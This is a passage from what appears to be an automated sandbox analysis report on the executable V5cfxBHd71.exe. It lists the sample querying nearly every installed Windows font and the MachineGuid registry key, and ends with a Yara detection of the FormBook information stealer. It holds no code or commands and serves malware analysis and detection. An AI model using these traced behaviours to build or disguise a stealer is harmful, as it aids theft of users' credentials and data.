Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\V5cfxBHd71.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 4.2.V5cfxBHd71.exe.400000.0.unpack, type: UNPACKEDPE
